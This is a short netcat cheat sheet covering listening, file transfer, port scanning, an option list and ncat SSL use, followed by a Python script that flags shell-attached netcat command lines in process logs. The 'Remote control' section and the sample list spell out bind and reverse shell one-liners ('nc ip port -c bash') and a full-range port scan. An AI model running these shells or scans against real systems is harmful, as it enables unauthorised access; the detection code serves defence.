netcat

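NC has no encryption and no authentication.

The Swiss Army knife of network tools.
It has a listen mode and a transfer mode.
It can transfer text messages and files.
It can be used for remote control.
It can be used for port scanning.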

```
nc -lp port                # listen
nc -nv ip port -q 1
nc -nvz ip 1-65535         # port scan
```


Remote control

Forward (on Windows, replace bash with cmd):

```
nc -lp port -c bash
nc ip port
```

Reverse:

```
nc -lp port
nc ip port -c bash
```

Options:

  • -c shell commands
  • -e, --exec=PROGRAM program to exec after connect
  • -g, --gateway=LIST source-routing hop point[s], up to 8
  • -G, --pointer=NUM source-routing pointer: 4, 8, 12, …
  • -h, --help display this help and exit
  • -i, --interval=SECS delay interval for lines sent, ports scanned
  • -l, --listen listen mode, for inbound connects
  • -L, --tunnel=ADDRESS:PORT forward local port to remote address
  • -n, --dont-resolve numeric-only IP addresses, no DNS
  • -o, --output=FILE output hexdump traffic to FILE (implies -x)
  • -p, --local-port=NUM local port number
  • -r, --randomize randomize local and remote ports
  • -s, --source=ADDRESS local source address (ip or hostname)
  • -t, --tcp TCP mode (default)
  • -T, --telnet answer using TELNET negotiation
  • -u, --udp UDP mode
  • -v, --verbose verbose (use twice to be more verbose)
  • -V, --version output version information and exit
  • -x, --hexdump hexdump incoming and outgoing traffic
  • -w, --wait=SECS timeout for connects and final net reads
  • -z, --zero zero-I/O mode (used for scanning)

ncat is included in the nmap toolkit.

```
ncat -c bash --allow ip -vnl port --ssl
ncat -nv ip port --ssl
```
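
A defender-side check for the command patterns in these notes, as an added example that is not part of the original post: it classifies process command lines (for instance from audit or EDR process logs) by whether a shell is attached to the socket, whether the channel lacks `--ssl`, and whether a listener lacks `--allow`. The sample lines, addresses and port are constructed, and the set of value-taking short options is an assumption based on the option list above.

```python
import shlex

# Short options that take a value (assumption: this page's option list, plus -q).
TAKES_VALUE = set("cegGiLopqsw")
EXEC_FLAGS = {"-c", "-e", "--exec", "--sh-exec"}  # --sh-exec: ncat long form of -c

def parse_flags(args):
    """Return the option names present in args, skipping option values."""
    flags, i = set(), 0
    while i < len(args):
        tok = args[i]
        if tok.startswith("--"):
            flags.add(tok.split("=", 1)[0])
        elif tok.startswith("-") and len(tok) > 1:
            for pos, ch in enumerate(tok[1:], start=1):
                flags.add("-" + ch)
                if ch in TAKES_VALUE:
                    # value is the next token unless attached to the cluster
                    i += int(pos == len(tok) - 1)
                    break
        i += 1
    return flags

def classify(cmdline):
    """Return findings for one process command line, or None if not netcat."""
    argv = shlex.split(cmdline)
    if not argv or argv[0].rsplit("/", 1)[-1] not in {"nc", "ncat", "netcat"}:
        return None
    flags = parse_flags(argv[1:])
    listening = bool(flags & {"-l", "--listen"})
    findings = []
    if flags & EXEC_FLAGS:  # a shell or program is attached to the socket
        findings.append("bind-shell" if listening else "reverse-shell")
        if "--ssl" not in flags:
            findings.append("cleartext")
        if listening and "--allow" not in flags:
            findings.append("no-source-restriction")
    if flags & {"-z", "--zero"}:
        findings.append("port-scan")
    return findings

# Constructed sample command lines (192.0.2.0/24 is a documentation range).
SAMPLES = [
    "nc -lp 4444 -c bash",
    "nc 192.0.2.10 4444 -c bash",
    "nc -nvz 192.0.2.10 1-65535",
    "ncat -c bash --allow 192.0.2.20 -vnl 4444 --ssl",
]
if __name__ == "__main__":
    print(*(f"{classify(s)} {s}" for s in SAMPLES), sep="\n")
```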
